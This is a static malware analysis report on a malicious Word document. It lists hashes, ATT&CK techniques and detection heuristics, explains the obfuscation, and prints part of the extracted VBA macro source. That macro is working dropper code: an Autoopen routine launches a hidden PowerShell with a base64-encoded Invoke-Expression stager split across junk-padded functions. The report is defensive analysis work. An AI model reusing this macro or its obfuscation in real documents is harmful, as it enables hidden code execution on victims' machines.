Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e0ee7c4e6bf9b8f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 97.5 KB
Created: 2018-06-12 17:22:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: 0023bcd631d0684bd3e5bf07ddc5e4ca
SHA-1: fce0665a5c7102aa18d7e85792d1f6c262bf09a5
SHA-256: 3e0ee7c4e6bf9b8f14a5448b1d2156a8a489ae80b0b9bb6c205b79b2bc93a2e0
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Word document carrying a VBA macro. Its Autoopen subroutine calls ckLZYU(), which passes a concatenated string to Shell(): RQcAwz (never assigned, so empty), Chr(JiRstaRPXw + vbKeyP + AiOjzuDAR), the literal "owers", and the return values of helper functions such as KaBvOPQlMSz() and kQjwNPP(). JiRstaRPXw and AiOjzuDAR are never assigned either (Empty counts as 0 under On Error Resume Next) and vbKeyP is the VBA constant 80, so Chr() yields "P" and the command line begins "PowersHeLL -e ". The second Shell() argument, 14365 - 14365, evaluates to 0 (vbHide), so PowerShell runs in a hidden window. The rest of the line is a base64 blob split into short literals across the helper functions. Read as UTF-16LE, the fragments returned by KaBvOPQlMSz() decode to the case-mangled text "iNVOke-exPReSsiON (new-OBJecT  Io.cOMpresSIOn.DefLATesTrEaM([syStem.IO.MemoryStrEaM] [sYstEM.CoNVErT]::Fr", and the first literal in kQjwNPP() continues it with "oMBasE64StRIng( 'VZDbT": a PowerShell stager that base64-decodes and decompresses an embedded second stage and executes it with Invoke-Expression. That embedded stage is cut off in the preview, so its behaviour cannot be assessed from this report. The surrounding Tan(), Hex(), CDbl() and Rnd() statements operate on unassigned variables and are junk inserted to pad the code and defeat simple signatures. These observations match the OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC heuristics and the ClamAV Doc.Dropper.Agent detection.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6582920-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6582920-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12730 bytes
SHA-256: 34c1e3edff6040fa3238d2fd0e1163fff5e26c77ead2c4e3ae90b56e6a2c327b
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "WXdpdICziHHD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ckLZYU()
On Error Resume Next
zYOWVB = Tan(21204)
HMpmcC = jpowo
YMsWE = CDbl(TZTEU)
wVjrRz = zrbiV
XfLEj = Hex(FSubL * ChrW(AQirK + Int(HUvjjm * Rnd(85094)) * pwpMw * Log(58907 * NjnHU - kPYBuX + Fix(51))))
QiTHj = Tan(76001)
ANqzZM = Tan(13971)
Idiihw = kvkpAX
WflOW = CDbl(GchfJ)
WApnh = jFGvT
pWizX = Hex(qmCvq * ChrW(NKpzY + Int(vCUccm * Rnd(89941)) * DjUSz * Log(52715 * VYAdJ - KoWCb + Fix(51))))
iaWTj = Tan(64041)
ckLZYU = DhbDLTI + Shell(RQcAwz + Chr(JiRstaRPXw + vbKeyP + AiOjzuDAR) + "owers" + KaBvOPQlMSz + kQjwNPP + nifDwHm + svzbnK + LJPmoZGA, 14365 - 14365)
zQvNtr = Tan(5874)
TJSkv = zslpV
alNwa = CDbl(dQhjN)
lYcvZL = lFprf
Rftih = Hex(iKSzNC * ChrW(msOmim + Int(izXnDT * Rnd(50136)) * kJluiu * Log(16859 * jlzwj - SYOscZ + Fix(51))))
XTGEi = Tan(48378)
End Function
Sub Autoopen()
On Error Resume Next
HGbOK = Tan(90331)
JOTUCd = iAiqM
jwZKq = CDbl(VMpfp)
VpOdKk = oCJKuY
vrsTXO = Hex(XmJhQ * ChrW(JZNTj + Int(UjnIAp * Rnd(96152)) * YwWoi * Log(73216 * FiUWH - dwDEwu + Fix(51))))
bOppa = Tan(30315)
ckLZYU
tHird = Tan(49002)
zYPUC = IEvtzb
rikDE = CDbl(ldJJhO)
hWzvc = iRfZnk
QEWTvs = Hex(MMLXfn * ChrW(ofoPiG + Int(wmHzRE * Rnd(88173)) * LJwSKi * Log(62739 * pNoPC - KZPoK + Fix(51))))
lrKEiG = Tan(39020)
End Sub


Attribute VB_Name = "OUinEaBCa"
Function KaBvOPQlMSz()
On Error Resume Next
DppnNo = Tan(95376)
wGjnK = aXDvTw
QVYrw = CDbl(pOkjzw)
FYKQi = kKwrw
zVqVRP = Hex(komTQ * ChrW(RpIHOZ + Int(qqYCNm * Rnd(24833)) * NtSic * Log(89183 * dwtSRd - fSEtU + Fix(51))))
RcDjR = Tan(22865)
BpTEstuZ = "HeLL -e aQBOAFY" + "ATwBr" + "AGUALQBlAHgAc" + "ABSAGUAcwBzA" + "GkATwBO" + "ACAAKABuA"
GwoIf = Tan(4131)
XuToo = SMJNw
HfLFz = CDbl(Svukq)
NQoshK = nPSokz
FSwFS = Hex(mJEaur * ChrW(oMGPmE + Int(bXNaiz * Rnd(54301)) * soqbG * Log(64991 * AwpRB - DMNzpT + Fix(51))))
aJDBfO = Tan(77357)
vSYDhOw = "GUAdw" + "AtAE" + "8AQgBKAGUA" + "YwBUA" + "CAAIABJAG8ALgB"
FXaTNd = Tan(33000)
jTkIa = JZUCn
Lzdpf = CDbl(ijkpvr)
juYPwo = mvdiE
XOzdj = Hex(bQWFul * ChrW(iuifuX + Int(PtRkKW * Rnd(28039)) * kPVwk * Log(40043 * UjHIS - dKoii + Fix(51))))
GZEQi = Tan(13680)
RwYGTYK = "jAE8" + "ATQBwAHI" + "AZQBzA" + "FMASQBP" + "AG4ALgBEAG" + "UAZgBMA" + "EEAVABlAHMAVAB" + "yAEUAYQ" + "BNACg" + "AWwBzAHkAUwB0"
vdwOT = Tan(20189)
HfHkw = TaawY
EdmjcG = CDbl(MIujwm)
YZiXUo = EHzDEi
rjwGsv = Hex(hJuUI * ChrW(wGNzIz + Int(ctwDd * Rnd(69028)) * AVofXY * Log(6644 * cwaGr - qQjCMB + Fix(51))))
zuwuHd = Tan(882)
IfDBIBPw = "AGUAbQAu" + "AEkATwAuAE0AZ" + "QBtAG8AcgB5" + "AFMAVAB" + "yAGU"
jvcIGB = Tan(23385)
Owjjd = RYBGPl
MARiqC = CDbl(qlQvCX)
Azzkni = UGcSWT
ZsBOOT = Hex(uLaQw * ChrW(ddjojF + Int(QbEVbH * Rnd(64798)) * toQUiz * Log(32797 * OjoEVF - XUotRr + Fix(51))))
omQiNw = Tan(78006)
pbtTz = "AYQBNAF0" + "AIABbA" + "HMAW" + "QBzAHQARQBNAC4"
mHmiBX = Tan(19486)
PnMlRH = BQKojB
NPBTzi = CDbl(AjSDi)
jSqEPN = ZFFFI
uPSDJH = Hex(ztWdhX * ChrW(tPEuhj + Int(LjZFZ * Rnd(37488)) * NIKvKT * Log(68917 * ijIvDu - vNXshi + Fix(51))))
BKYZS = Tan(67588)
kYXEFjsuzZ = "AQ" + "wBvAE4AVgBF" + "AH" + "IAVABdADoAO" + "gBGAHI"
KaBvOPQlMSz = BpTEstuZ + vSYDhOw + RwYGTYK + IfDBIBPw + pbtTz + kYXEFjsuzZ
End Function
Function kQjwNPP()
On Error Resume Next
tzkoCm = Tan(71406)
iWDwF = XllfTX
MijmwD = CDbl(zXlAA)
piYHB = CkfAo
ZcdZmt = Hex(LtjPDB * ChrW(idMKl + Int(vwspN * Rnd(57661)) * KVDhhs * Log(2534 * biZls - pNITU + Fix(51))))
zaYYU = Tan(29774)
zzZRbUfmVKB = "Abw" + "BNAEIAYQ" + "BzAEUA" + "NgA" + "0AFMA" + "dABSAEkAbgBnACg" + "AIAAnAFYAWgBE" + "AG" + "IAVABz" + "AE"
pakoMI = Tan(28121)
ppzhLA = GzmZsB
ljVsY = CDbl(kzfMSG)
wqpNc = MzXIlJ
RTYmv = Hex(kjoAS * ChrW(kjEsK + Int(PEojPJ * Rnd(47649)) * PoGNbk * Log(68177 * QRYtR - WcJqXt + Fix(51))))
wIHMVW = Tan(8526)
lbzRQGRXfjk = "oAQQBFAEk
... (truncated)